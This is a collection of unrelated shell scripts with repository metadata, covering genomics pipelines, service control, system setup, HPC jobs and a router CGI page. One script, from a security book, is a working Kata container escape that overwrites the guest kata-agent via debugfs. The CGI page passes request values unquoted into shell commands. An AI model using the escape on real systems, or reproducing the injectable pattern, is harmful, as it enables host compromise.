UTF-8
| 3,869
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
set -xe -o pipefail
shopt -s extglob
source $( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )/../include.sh
PC=$BASEDIR/nc/posConNCwithCodingPartner.bedx
HIC=$BASEDIR/downstream/hic
DIR=$BASEDIR/downstream/ctcf
mkdir -p $DIR/data
if [[ ! -f $DIR/data/tfbs.bed ]]; then
wget -O - http://hgdownload.cse.ucsc.edu/goldenPath/hg19/encodeDCC/wgEncodeRegTfbsClustered/wgEncodeRegTfbsClusteredWithCellsV3.bed.gz | gunzip > $DIR/data/tfbs.bed
fi
awk '$4=="CTCF"' $DIR/data/tfbs.bed > $DIR/data/ctcf_hg19.bed
$LIFTOVER -bedPlus=5 $DIR/data/ctcf_hg19.bed $BASEDIR/data/hg19ToHg38.over.chain $DIR/data/ctcf.unsorted.bed $DIR/data/ctcf.unmapped
sort -k1,1 -k2,2n -k3,3n $DIR/data/ctcf.unsorted.bed > $DIR/data/ctcf.bed
#################################################################
# How many pcRNAs are associated with CTCF sites in their pomoter?
#################################################################
mkdir -p $DIR/CtcfOverlapPromoter
$INTERSECT_BED -wo -a $HIC/posConAnnot_PROMOTER+-2000.bed -b $DIR/data/ctcf.bed | bedtools groupby -i - -g 4 -c 4 -o count > $DIR/CtcfOverlapPromoter/pc_with_ctcf_in_prom.txt
$INTERSECT_BED -wo -a $HIC/Gencode.v21.linc.spliced_PROMOTER+-2000.bed -b $DIR/data/ctcf.bed | bedtools groupby -i - -g 4 -c 4 -o count > $DIR/CtcfOverlapPromoter/lincs_with_ctcf_in_prom.txt
$INTERSECT_BED -wo -a $HIC/coding_PROMOTER+-2000.bed -b $DIR/data/ctcf.bed | bedtools groupby -i - -g 4 -c 4 -o count > $DIR/CtcfOverlapPromoter/pcCoding_with_ctcf_in_prom.txt
$INTERSECT_BED -wo -a $BASEDIR/coding/Gencode-current_hsa_coding_PROMOTER+-2000.bed -b $DIR/data/ctcf.bed | bedtools groupby -i - -g 4 -c 4 -o count > $DIR/CtcfOverlapPromoter/gencode_coding_with_ctcf_in_prom.txt
cat <<EOT >$DIR/CtcfOverlapPromoter/ctcf_contact_summary.txt
Category WithLoop Total
pcRNA $(wc -l $DIR/CtcfOverlapPromoter/pc_with_ctcf_in_prom.txt | awk '{print $1}') $(wc -l $HIC/posConAnnot_PROMOTER+-2000.bed | awk '{print $1}')
lincRNAs $(wc -l $DIR/CtcfOverlapPromoter/lincs_with_ctcf_in_prom.txt | awk '{print $1}') $(wc -l $HIC/Gencode.v21.linc.spliced_PROMOTER+-2000.bed | awk '{print $1}')
pcCoding $(wc -l $DIR/CtcfOverlapPromoter/pcCoding_with_ctcf_in_prom.txt | awk '{print $1}') $(wc -l $HIC/coding_PROMOTER+-2000.bed | awk '{print $1}')
GencodeCoding $(wc -l $DIR/CtcfOverlapPromoter/gencode_coding_with_ctcf_in_prom.txt | awk '{print $1}') $(wc -l $BASEDIR/coding/Gencode-current_hsa_coding_PROMOTER+-2000.bed | awk '{print $1}')
EOT
#################################################################
# ALL: Make heatmaps of CTCF overlap
#################################################################
# bamCoverage and computeMatrix are part of deepTools
mkdir -p $DIR/pcCoverageByCtcfAllLines
# Convert the loops to big wig
awk 'BEGIN{OFS=FS="\t"}{print $1,$2,$3,"CTCF_"NR}' $DIR/data/ctcf.bed > $DIR/data/ctcf.bed4
$BEDTOBAM -i $DIR/data/ctcf.bed4 -g $BASEDIR/data/hg38.chromSizes > $DIR/data/ctcf.bam.unsorted
$SAMTOOLS sort $DIR/data/ctcf.bam.unsorted $DIR/data/ctcf
$SAMTOOLS index $DIR/data/ctcf.bam $DIR/data/ctcf.bam.bai
bamCoverage -b $DIR/data/ctcf.bam -o $DIR/data/ctcf.bw
# Compute matrices
mkdir -p $DIR/pcCoverageByCtcfAllLines/matrix/
computeMatrix scale-regions -b 20000 -a 20000 -m 10000 --regionsFileName $HIC/pcCoverageByLoops/annotationByPosition/posConAnnot.bed --sortRegions "no" --outFileNameMatrix $DIR/pcCoverageByCtcfAllLines/matrix/peaks_pc_matrix.txt --scoreFileName $DIR/data/ctcf.bw --missingDataAsZero --outFileName /dev/null -p 1
Rscript $BIN/dtCompare.R --files $DIR/pcCoverageByCtcfAllLines/matrix/peaks_pc_matrix.txt --labels Ctcf --profileStdErr --noHeat --profW 10 --profH 10 --outFile $DIR/pcCoverageByCtcfAllLines/CTCF_coverage
convert -density 300 $DIR/pcCoverageByCtcfAllLines/CTCF_coverage_profile.pdf -quality 100 $DIR/pcCoverageByCtcfAllLines/CTCF_coverage_profile.png
| true
|
f66f70492d888f5f5f9457f925578d302139136e
|
Shell
|
christaotaoz/shkd-work
|
/work/panabit_plugin/pa_plugin/cfy/Route/src/dhcpsvr_leaselist
|
GB18030
| 5,152
| 3.078125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
#This script is created by ssparser automatically. The parser first created by MaoShouyan
printf "Content-type: text/html;charset=gb2312
Cache-Control: no-cache
"
echo -n "";
. ../common/common.sh
myself="/cgi-bin/Route/`basename $0`"
[ "${CGI_id}" = "" ] && CGI_id=0
echo -n "
<script type=\"text/javascript\" src=\"/img/common.js\"></script>
<script language=\"javascript\">
function deleteLease(mac)
{
if (confirm(\"ȷҪɾ⻧?\"))
window.location.href = \"${myself}?action=delete&mac=\" + mac;
}
function addStatic(mac, ip, desc)
{
var args;
args=\"&mac=\" + mac + \"&ip=\" + ip;
if (desc != \"\")
args += \"&desc=\" + desc;
window.location.href = \"${myself}?action=addstatic\" + args;
}
function showIp(ipaddr)
{
var url = \"/cgi-bin/Monitor/ipview_data?ipaddr=\" + ipaddr;
ShowWindow(url, \"\", 650, 700);
}
function showServer(name)
{
var url = \"/cgi-bin/Monitor/proxy_show?proxyname=\" + name;
ShowWindow(url, \"\", 350, 380);
}
</script>
";
if [ "${CGI_action}" = "delete" ]; then
errmsg=`${FLOWEYE} dhcplease remove mac=${CGI_mac}`
if [ "$?" != "0" ]; then
afm_dialog_msg "ʧ:${errmsg}"
fi
elif [ "${CGI_action}" = "addstatic" ]; then
cmdargs="mac=${CGI_mac} ip=${CGI_ip}"
[ "${CGI_desc}" != "" ] && cmdargs="${cmdargs} desc=${CGI_desc}"
errmsg=`${FLOWEYE} dhcpsta add ${cmdargs}`
if [ "$?" != "0" ]; then
afm_dialog_msg "ʧ:${errmsg}"
fi
fi
echo -n "
<body>
"; cgi_show_title "DHCP->⻧Ϣ"
echo -n "
<br>
<table width=1000 border=0 cellspacing=1 cellpadding=1>
<form method=post action=\"${myself}\">
<tr id=tblhdr height=22>
<td width=* align=left>ѡ
<select name=id value=\"${CGI_id}\" style=\"width:105;height:21\">
";
if [ "${CGI_id}" = "0" ]; then
echo "<option value=0 selected>з</option>"
else
echo "<option value=0>з</option>"
fi
${FLOWEYE} nat listproxy type=routerif | while read type id name theothers
do
if [ "${id}" = "${CGI_id}" ]; then
echo "<option value=${id} selected>${name}</option>"
else
echo "<option value=${id}>${name}</option>"
fi
done
echo -n "
</select> <input type=text name=filter style=\"width:200\" value=\"${CGI_filter}\" />
<input type=submit value=\"ѯ\" style=\"width:70;height:20\"></input>
</td>
</tr>
</form>
</table>
<table width=1000 border=0 cellspacing=1 cellpadding=1>
<tr id=tblhdr height=22>
<td width=30 align=left></td>
<td width=70 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=server\">DHCP</a></td>
<td width=125 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=mac\">MACַ</a></td>
<td width=110 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=ip\">IPַ</a></td>
<td width=180 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=name\">û</a></td>
<td width=40 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=vlan\">VLAN</a></td>
<td width=60 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=state\">״̬</a></td>
<td width=60 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=type\"></a></td>
<td width=120 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=birth\">ʱ</a></td>
<td width=60 align=right><a style=\"color:#0000ff\" href=\"${myself}?sort=ttl\">()</a></td>
<td width=* align=right> </td>
</tr>
";
case "${CGI_sort}" in
"server")
sortargs="-k2"
;;
"mac")
sortargs="-k3"
;;
"ip")
sortargs="-k4"
;;
"name")
sortargs="-k5"
;;
"vlan")
sortargs="-k6"
;;
"state")
sortargs="-k7"
;;
"type")
sortargs="-k8"
;;
"birth")
sortargs="-k9"
;;
"ttl")
sortargs="-k10"
;;
*)
sortargs="-k4"
;;
esac
cmdargs=""
[ "${CGI_id}" != "0" ] && cmdargs="${cmdargs} id=${CGI_id}"
idname="row1"
count=0
${FLOWEYE} dhcplease list ${cmdargs} | grep "${CGI_filter}" | sort ${sortargs} | \
while read lanif mac ip uip name vlan state type ltime ttl theothers
do
echo -n "
<tr id=${idname}>
<td align=left>${count} </td>
<td align=right><a style=\"color:#0000ff\" href=\"javascript:showServer('${lanif}')\">${lanif} </a></td>
<td align=right>${mac} </td>
<td align=right><a href=\"javascript:showIp('${ip}')\">${ip} </a></td>
"; [ "${name}" = "NULL" ] && name=""
echo -n "
<td align=right>${name} </td>
<td align=right>${vlan}</td>
<td align=right>${state}</td>
"; if [ "${type}" = "STATIC" ]; then
echo -n "
<td align=right>̬</td>
"; else
echo -n "
<td align=right>̬</td>
"; fi
echo -n "
<td align=right>${ltime}</td>
<td align=right>${ttl}</td>
<td align=right>
<a style=\"color:#0000ff\" href=\"javascript:deleteLease('${mac}')\">ɾ</a>
"; if [ "${type}" != "STATIC" ]; then
echo -n "
<a style=\"color:#0000ff\" href=\"javascript:addStatic('${mac}', '${ip}', '${name}')\">ת̬</a>
"; else
echo -n "
ת̬
"; fi
echo -n "
</td>
</tr>
"; if [ "${idname}" = "row1" ]; then
idname="row2"
else
idname="row1"
fi
count=$((${count} + 1))
done
echo -n "
</table>
</body>
</html>
";
| true
|
d91cb78db7ea38ea2cb8a6dcedb58c104fa531c3
|
Shell
|
woodstok/tmux-butler
|
/modes/butler-history
|
UTF-8
| 251
| 2.671875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
ROOTDIR="$( cd "$(dirname "$0")/.." >/dev/null 2>&1 ; pwd -P )"
export READER="cat $ROOTDIR/.history | uniq"
# Get the buffername from the selection
export SELECTOR="$ROOTDIR/scripts/fzf-common --no-sort"
$ROOTDIR/tmux-butler
| true
|
d11e136b854247b76526c06a81c492e7ea5a947f
|
Shell
|
GbalsaC/edxRoot
|
/scripts/ctl.sh
|
UTF-8
| 3,477
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
WORKERS=( "edx.lms.core.low" "edx.lms.core.default" "edx.lms.core.high" "edx.lms.core.high_mem" "edx.cms.core.low" "edx.cms.core.default" "edx.cms.core.high" )
WORKERS_CONCURRENCY=( "1" "3" "4" "2" "3" "4" "1" )
start_worker() {
cd /opt/bitnami/apps/edx/edx-platform
if [ `id|sed -e s/uid=//g -e s/\(.*//g` -eq 0 ]; then
su -s /bin/sh daemon -c "/opt/bitnami/apps/edx/edx-platform/bin/python.edxapp ./manage.py lms --settings=aws celery worker -I contentstore.tasks --loglevel=info --queues=$1 --hostname=$1.%h --concurrency=$2 > /opt/bitnami/apps/edx/edxapp/log/$1.log 2>&1 &"
else
/opt/bitnami/apps/edx/edx-platform/bin/python.edxapp ./manage.py lms --settings=aws celery worker -I contentstore.tasks --loglevel=info --queues=$1 --hostname=$1.%h --concurrency=$2 > /opt/bitnami/apps/edx/edxapp/log/$1.log 2>&1 &
fi
cd - > /dev/null
}
stop_worker() {
ps axf | grep "/opt/bitnami/apps/edx/edx-platform/venv/bin/python" | grep "queues=$1" | grep -v grep | awk '{print "kill -9 " $1}' | sh
}
is_celery_worker_running() {
if [[ -n $(ps axf | grep "/opt/bitnami/apps/edx/edx-platform/venv/bin/python" | grep "queues=$1" | grep -v grep) ]]; then
RUNNING=1
else
RUNNING=0
fi
return $RUNNING
}
are_edx_workers_running() {
WORKERS_RUNNING=0
for WORKER in ${WORKERS[*]}; do
is_celery_worker_running $WORKER
let WORKERS_RUNNING=WORKERS_RUNNING+$?
done
RES="Number of running workers $WORKERS_RUNNING"
if [ "$WORKERS_RUNNING" -gt "1" ] && [ "$WORKERS_RUNNING" -lt "7" ]; then
RUNNING=2
EDX_STATUS="Some edX Celery workers are running: $RES"
elif [ "$WORKERS_RUNNING" == "7" ]; then
RUNNING=1
EDX_STATUS="edX Celery workers already running"
else
RUNNING=0
EDX_STATUS="edX Celery workers not running"
fi
return $RUNNING
}
stop_edx_workers() {
are_edx_workers_running
RUNNING=$?
if [ $RUNNING -eq 0 ]; then
echo "$0 $ARG: $EDX_STATUS"
exit
fi
for WORKER in ${WORKERS[*]}; do
stop_worker $WORKER
done
are_edx_workers_running
ERROR=$?
if [ $ERROR -eq 0 ]; then
EDX_STATUS="edX workers stopped"
else
EDX_STATUS="edX workers could not be stopped: $RES"
ERROR=3
fi
}
start_edx_workers() {
are_edx_workers_running
RUNNING=$?
if [ $RUNNING -eq 1 ]; then
echo "$0 $ARG: edX workers already running"
exit
fi
LIMIT=`expr ${#WORKERS[*]} - 1`
for INDEX in `seq 0 $LIMIT`; do
is_celery_worker_running ${WORKERS[$INDEX]}
if [[ $RUNNING -eq 0 ]]; then
start_worker ${WORKERS[$INDEX]} ${WORKERS_CONCURRENCY[$INDEX]}
fi
done
sleep 3
are_edx_workers_running
RUNNING=$?
if [ $RUNNING -eq 1 ]; then
EDX_STATUS="edX workers started"
else
EDX_STATUS="edX failed to start: $RES"
fi
}
status_edx_workers() {
CONT=0
STATUS=2
while [[ $CONT -lt 5 && $STATUS -eq 2 ]]; do
are_edx_workers_running
STATUS=$?
if [[ $STATUS -eq 2 ]]; then
#some runners are not running, trying to recover them
start_edx_workers
fi
let CONT=CONT+1
sleep 2
done
}
if [ "x$1" = "xstart" ]; then
start_edx_workers
elif [ "x$1" = "xstop" ]; then
stop_edx_workers
elif [ "x$1" = "xstatus" ]; then
status_edx_workers
fi
echo "$EDX_STATUS"
| true
|
28c075b1c9140bdd7aea7ad43619a7645e01a55d
|
Shell
|
vfbsilva/docker
|
/theano/run.sh
|
UTF-8
| 382
| 2.96875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
IMAGE=theanogru-gpu
if [ "$1" == "train" ]; then
CMD=./train.sh
elif [ "$1" == "process" ]; then
CMD=./process.sh
else
CMD=bash
fi
# execute docker run with nvidia driver and device
docker run -it --device=/dev/nvidiactl --device=/dev/nvidia-uvm --device=/dev/nvidia0 --volume-driver nvidia-docker -v nvidia_driver_367.57:/usr/local/nvidia:ro $IMAGE $CMD
| true
|
a449e559ba11b08189e7735dcc3c93b21b3052cc
|
Shell
|
vishalsacharya/stokes
|
/scripts/3stampede.job
|
UTF-8
| 1,896
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
#SBATCH -J TBSLAS
#SBATCH --export=ALL
#SBATCH -n 64 # total number of mpi tasks requested
#SBATCH -N 64 # nodes
#SBATCH -p normal # queue (partition) -- normal, development, etc.
#SBATCH -t 02:00:00 # run time (hh:mm:ss) - 1.5 hours
#SBATCH --mail-user=arash@ices.utexas.edu
#SBATCH --mail-type=begin # email me when the job starts
#SBATCH --mail-type=end # email me when the job finishes
WORK_DIR=${PWD}
cd ${WORK_DIR}
# odes+=( 1 9 47 227 1024 );
# cores+=( 16 16 16 16 16 );
# mpi_proc+=( 1 9 47 227 1024 );
# threads+=( 16 16 16 16 16 );
# test_case+=( 3 3 3 3 3 );
# pt_cnt+=( 1000 1000 1000 1000 1000 );
# pt_rad+=( 0.10 0.10 0.10 0.10 0.10 );
# jump_width+=( 1e-9 1e-9 1e-9 1e-9 1e-9 );
# rho+=( 1e+9 1e+9 1e+9 1e+9 1e+9 );
# ref_tol+=( 1e-9 1e-9 1e-9 1e-9 1e-9 );
# min_depth+=( 1 1 1 1 1 );
# max_depth+=( 5 6 7 8 9 );
# fmm_q+=( 14 14 14 14 14 );
# fmm_m+=( 10 10 10 10 10 );
# gmres_tol+=( 1e-8 1e-8 1e-8 1e-8 1e-8 );
# gmres_iter+=( 200 200 200 200 200 );
# max_time+=( 360000 360000 360000 360000 360000 );
module load fftw3
export OMP_NUM_THREADS=16
export TBSLAS_RESULT_DIR=${WORK}/stokes_tc_3
mkdir -p ${TBSLAS_RESULT_DIR};
time ibrun tacc_affinity bin/stokes -test_case 3 -pt_cnt 1000 -pt_rad 0.10 -j\
ump_width 1e-9 -rho 4.0e+9 -ref_tol 1e-9 -min_depth 1 -max_depth 5 -fmm_q 14 -fmm_m 10 -gmres\
_tol 1e-8 -gmres_iter 200 -tn 1
### End of script
| true
|
834df846249027e341fdb691d8ec034eb220417b
|
Shell
|
raghavnauhria/whatmt
|
/pytorch/.jenkins/pytorch/macos-build-test.sh
|
UTF-8
| 298
| 2.84375
| 3
|
[
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] |
permissive
|
#!/bin/bash
if [ -z "${BUILD_ENVIRONMENT}" ] || [[ "${BUILD_ENVIRONMENT}" == *-build* ]]; then
source "$(dirname "${BASH_SOURCE[0]}")/macos-build.sh"
fi
if [ -z "${BUILD_ENVIRONMENT}" ] || [[ "${BUILD_ENVIRONMENT}" == *-test* ]]; then
source "$(dirname "${BASH_SOURCE[0]}")/macos-test.sh"
fi
| true
|
72eff12506203d4501fd8a0b5c6f878a967338d6
|
Shell
|
techno-tanoC/shell
|
/arch.sh
|
UTF-8
| 2,018
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/sh
set -eu
setup_base() {
sudo pacman-mirrors -c Japan
sudo pacman -Syyu
sudo pacman -S --noconfirm yay
sudo pacman -S --noconfirm tree
sudo pacman -S --noconfirm vim
# binutils installs the strip command
sudo pacman -S --noconfirm base-devel
sudo pacman -S --noconfirm zsh
sudo pacman -S --noconfirm fd
sudo pacman -S --noconfirm ripgrep
sudo pacman -S --noconfirm dnsutils
yay -S --noconfirm peco
yay -S --noconfirm ngrok-bin
yay -S --noconfirm direnv-bin
}
setup_app() {
# VM の背景が透明になる場合は Kvantum が原因かも
sudo pacman -S --noconfirm virtualbox linux510-virtualbox-host-modules linux510-virtualbox-guest-modules
sudo pacman -S --noconfirm transmission-gtk
sudo pacman -S --noconfirm spacefm
sudo pacman -S --noconfirm gnome-control-center
yay -S --noconfirm gnome-session-properties
sudo pacman -S --noconfirm gnome-tweaks
sudo pacman -S --noconfirm eog
sudo pacman -S --noconfirm vlc
# yay -S --noconfirm google-chrome
yay -S --noconfirm patch slack-desktop
yay -S --noconfirm visual-studio-code-bin
yay -S --noconfirm bitwarden-bin
yay -S --noconfirm xsel
yay -S --noconfirm insomnia-bin
# install font
sudo pacman -S --noconfirm otf-ipaexfont
sudo pacman -S --noconfirm noto-fonts-emoji
fc-cache -vf
# uninstall terrain
sudo pacman -R --noconfirm mesa-demos lib32-mesa-demos
}
setup_fcitx() {
sudo pacman -S --refresh --noconfirm fcitx-im fcitx-configtool fcitx-mozc
echo '''
export GTK_IM_MODULE=fcitx
export QT_IM_MODULE=fcitx
export XMODIFIERS=@im=fcitx
# to autostart
# fcitx-autostart &
# to remap capslock to ctrl
# setxkbmap -option ctrl:nocaps
''' | sudo tee -a /etc/environment
}
setup_docker() {
sudo pacman -S --refresh --noconfirm docker docker-compose docker-machine
sudo usermod -aG docker $USER
sudo systemctl enable docker.service
sudo systemctl start docker.service
}
setup_base
setup_app
setup_fcitx
setup_docker
LANG=C xdg-user-dirs-gtk-update
| true
|
67205c7d4ed244fd2bb683270a31b20808bc0135
|
Shell
|
stfxecutables/dynamic_loss
|
/apptainer/helper_scripts/prepare_code.sh
|
UTF-8
| 808
| 2.9375
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
SCRIPT_DIR="$( cd -- "$( dirname -- "${BASH_SOURCE[0]:-$0}"; )" &> /dev/null && pwd 2> /dev/null; )";
APPTAINER_ROOT="$(dirname "$SCRIPT_DIR")"
PROJECT="$(dirname "$APPTAINER_ROOT")"
PREP="$PROJECT/prepare"
RUN_SCRIPTS="run_scripts"
SCRIPTS="scripts"
SRC="src"
TEST="test"
EXPERIMENTS="experiments"
cd "$PROJECT" || exit
rm -rf run_scripts.tar scripts.tar src.tar test.tar experiments.tar
tar --exclude="__pycache__" -cvf run_scripts.tar "$RUN_SCRIPTS"
tar --exclude="__pycache__" -cvf scripts.tar "$SCRIPTS"
tar --exclude="__pycache__" -cvf src.tar "$SRC"
tar --exclude="__pycache__" -cvf test.tar "$TEST"
tar --exclude="__pycache__" -cvf experiments.tar "$EXPERIMENTS"
mv run_scripts.tar "$PREP"
mv scripts.tar "$PREP"
mv src.tar "$PREP"
mv test.tar "$PREP"
mv experiments.tar "$PREP"
| true
|
14c1af33187c2b00584b44447df0cdf88c7bdeef
|
Shell
|
wonkarthik/myscripts
|
/sample/yacy.sh
|
UTF-8
| 1,303
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
pidof java && kill `pidof java`
grep yacy /etc/passwd || useradd -m -s /bin/bash -d /opt/yacy yacy
# get java8
test -f /etc/ssl/certs/java/cacerts || apt-get install ca-certificates-java -y
apt-get remove default-jre ca-certificates-java openjdk-7-jre openjdk-7-jre-headless -y
apt-get autoremove
cd /opt/
rm -rf java* jre*
wget "http://javadl.oracle.com/webapps/download/AutoDL?BundleId=211989" -O /opt/java8.tar.gz
tar xfvz java8.tar.gz
cd jre1.8*/bin
ln -sfv "`pwd`/java" /usr/bin/java
cd ../lib/security
test -f /etc/ssl/certs/java/cacerts && ln -sfv /etc/ssl/certs/java/cacerts "`pwd`/cacerts" || echo "ca-certificates-java not found"
# setup yacy
cd /opt/yacy
test -e DATA || mkdir -v DATA
wget http://yacy.net/release/yacy_v1.90_20160704_9000.tar.gz -O yacy.tar.gz
tar xfvz yacy.tar.gz
cd yacy
ln -s /opt/yacy/DATA /opt/yacy/yacy/DATA
chmod +x /opt/yacy/yacy/startYACY.sh
chmod +x /opt/yacy/yacy/stopYACY.sh
chmod +x /opt/yacy/yacy/bin/passwd.sh
chown yacy /opt/yacy -R
chmod 700 /opt/yacy
ln -sfv "/opt/yacy/DATA/LOG/yacy00.log" "/opt/yacy/daemon.log"
# start yacy
pidof java || su -c "/opt/yacy/yacy/startYACY.sh" yacy
pidof java || sudo -u yacy /opt/yacy/yacy/startYACY.sh
# set yacy password
/opt/yacy/yacy/bin/passwd.sh PASSWORDHERE
# stop yacy
/opt/yacy/yacy/stopYACY.sh
| true
|
f33d4a517500ad036104e48b273fc3e1c6c8c37b
|
Shell
|
rxxq/CSC209_assignments
|
/practice/largest_file.sh
|
UTF-8
| 282
| 3.578125
| 4
|
[] |
no_license
|
#! /bin/bash
PATH=/bin:/usr/bin
if test $# -eq 0
then
echo usage: $0 file ... >&2
exit 1
fi
maxsize=-1
for i
do
echo $i
thissize=`wc -c <"$i"`
if test $thissize -gt $maxsize
then
maxsize=$thissize
maxname="$i"
fi
done
echo "$maxname"
| true
|
c7114c5b02767af6de52907555250dcfe81ef575
|
Shell
|
UniversityOfHelsinkiCS/sis-importer
|
/importer-db-staging-sampletaker/run.sh
|
UTF-8
| 2,921
| 4.09375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Exit on error
set -e
# constants
container="importer-db-staging-copy"
db="sis-importer-db"
# Get dump from pannu to local env or copy inside pannu
get_dump() {
read -rp "Are you running this locally or in pannu(l/p)?" RUNENV
pannupath="/home/importer_user/staging/backup/importer-db-staging.sqz"
if [ "$RUNENV" = "l" ]; then
# Get db from pannu to current folder
echo "Enter your Uni Helsinki username:"
read -r username
echo "Using your Uni Helsinki username: $username"
scp -r -o ProxyCommand="ssh -l $username -W %h:%p melkki.cs.helsinki.fi" \
"$username@importer:$pannupath" importer-db-staging.sqz
elif [ "$RUNENV" = "p" ]; then
cp $pannupath .
else
echo "Wrong option $RUNENV!"
exit 1
fi
}
# Setup function
retry () {
for i in {1..60}; do
"$@" && break || echo "Retry attempt $i failed, waiting..." && sleep 10;
done
}
drop_psql () {
echo "Dropping psql in container $1 with db name $2"
retry docker exec -u postgres "$1" pg_isready --dbname="$2"
docker exec -u postgres "$1" dropdb "$2" || echo "container $1 DB $2 does not exist"
}
ping_psql () {
drop_psql "$1" "$2"
echo "Creating psql in container $1 with db name $2"
retry docker exec -u postgres "$1" pg_isready --dbname="$2"
docker exec -u postgres "$1" createdb "$2" || echo "container $1 DB $2 already exists"
}
restore_psql_from_backup () {
echo ""
echo "Restoring database from backup ($1/$2):"
echo " 1. Copying dump..."
docker cp "$1" "$2:/asd.sqz"
echo " 2. Writing database..."
docker exec "$2" pg_restore -U postgres --no-owner -F c --dbname="$3" -j4 /asd.sqz
}
setup_db () {
docker-compose up -d "$container"
drop_psql "$container" "$db"
ping_psql "$container" "$db"
restore_psql_from_backup importer-db-staging.sqz "$container" "$db"
# Run analyze to ensure postgres query optimizer has needed info
docker exec "$container" psql -U postgres "$db" -c 'ANALYZE;'
}
create_sample () {
# Ensure that newest version of sampletaker is used
docker-compose build importer-db-staging-sampletaker
# Run sampletaker: first dry-run, then confirm
docker-compose run --rm importer-db-staging-sampletaker
read -rp "Create sample by nuking extra stuff from db(y/n)?" CREATE
if [ "$CREATE" != "y" ]; then
exit 0
fi
docker-compose run --rm -e DESTROY=TRUE importer-db-staging-sampletaker
# Vacuum the sample database
docker exec "$container" psql -U postgres "$db" -c 'VACUUM FULL;'
# Finally create dump that contains only the new sample
docker exec -i "$container" pg_dump -Fc -U postgres "$db" > sis-importer-db.sqz
}
cleanup () {
# Remove original dump
rm importer-db-staging.sqz
# Run down services
docker-compose down --rmi all --volumes --remove-orphans
}
# run script in phases, comment out phase if need to debug
get_dump
setup_db
create_sample
cleanup
| true
|
ea7fc3ca7fd54872ba89a3c020fcbe27941199a8
|
Shell
|
boti-li/cloud-native-security-book
|
/code/0304-运行时攻击/02-安全容器逃逸/docker/attack.sh
|
UTF-8
| 997
| 3.984375
| 4
|
[] |
no_license
|
#!/bin/bash
set -e
echo -e "\t[+] In the evil container"
echo -e "\t[*] Searching for the device..."
found_clh_dev=false
for path in /sys/dev/block/* ; do
curr_target=$(readlink $path)
if [[ $curr_target == *"vda1"* ]]; then
dev=$(basename $path)
guest_fs_major=$(echo $dev | cut -f1 -d:)
guest_fs_minor=$(echo $dev | cut -f2 -d:)
found_clh_dev=true
break
fi
done
if [ "$found_clh_dev" = false ]; then
echo -e "\t[!] no vda1 device, not on CLH, shutting down..."
exit 1
fi
echo -e "\t[+] Device found"
echo -e "\t[*] Mknoding..."
mknod --mode 0600 /dev/guest_hd b $guest_fs_major $guest_fs_minor
echo -e "\t[+] Mknoded successfully"
# Ok we're on CLH, let's run the attack
echo -e "\t[*] Replacing the guest kata-agent..."
cmd_file=/tmp/debugfs_cmdfile
rm -rf $cmd_file
cat <<EOF > $cmd_file
open -w /dev/guest_hd
cd /usr/bin
rm kata-agent
write /evil-kata-agent kata-agent
close -a
EOF
# Execute cmdfile
/sbin/debugfs -f $cmd_file
echo -e "\t[+] Done"
| true
|
0b8746bcc479e571124aea7e8a634f65eaf28b77
|
Shell
|
fteychene/dokku-alt
|
/plugins/dokku-postgresql/pre-delete
|
UTF-8
| 512
| 3.203125
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
source "$(dirname $0)/vars"
verify_app_name "$1"
DB_LINKS="$DB_APP_DATABASES$APP/"
DB_APP_PASSWORD="$DB_APP_PASSWORDS$APP"
# Revoke all privileges
[[ ! -d "$DB_LINKS" ]] || ls -1 "$DB_LINKS" | while read DB_NAME; do
pgsql_admin <<EOF || true
REVOKE ALL PRIVILEGES ON DATABASE "$DB_NAME" FROM "$APP";
EOF
done
# Drop user
if [[ -f "$DB_APP_PASSWORD" ]] || [[ -d "$DB_LINKS" ]]; then
pgsql_admin <<EOF || true
DROP USER IF EXISTS "$APP";
EOF
fi
rm -rf "$DB_LINKS" "$DB_APP_PASSWORD"
| true
|
32766e6c461abd898f439e3a1209591da00c2499
|
Shell
|
jgrocho/dot-files
|
/xinitrc
|
UTF-8
| 1,516
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/sh
#
# ~/.xinitrc
#
# Executed by startx (run your window manager from here)
if [[ -d /etc/X11/xinit/xinitrc.d ]]; then
for f in /etc/X11/xinit/xinitrc.d/*; do
[[ -x "$f" ]] && . "$f"
done
unset f
fi
# Set the cursor (XMonad does not set one by default)
xsetroot -cursor_name left_ptr
# Set screen layout based on hostname
case "$HOSTNAME" in
qubert) xrandr --output LVDS1 --auto --primary --output VGA1 --auto --above LVDS1 ;;
theia) xrandr --output HDMI-0 --auto --primary ;;
esac
declare units=(
xresources
fehbg
urxvtd
unclutter
redshift@0
redshift@1
xautolock
)
systemctl --user start ${units[@]}
# Start the VirtualBox guest additons
hash VBoxClient-all 2>/dev/null && { VBoxClient-all & }
# Start arbtt to collect statistics about window usage
[[ -f ~/.arbtt/.virthualenv/bin/activate ]] \
&& (source ~/.arbtt/.virthualenv/bin/activate \
&& arbtt-capture &)
xinput set-prop "TPPS/2 IBM TrackPoint" "Evdev Wheel Emulation" 1
xinput set-prop "TPPS/2 IBM TrackPoint" "Evdev Wheel Emulation Button" 2
xinput set-prop "TPPS/2 IBM TrackPoint" "Evdev Wheel Emulation Timeout" 200
xinput set-prop "TPPS/2 IBM TrackPoint" "Evdev Wheel Emulation Axes" 6 7 4 5
xinput set-prop "TPPS/2 IBM TrackPoint" "Device Accel Constant Deceleration" 0.95
# xmonad is not a reparenting window manager, tell java
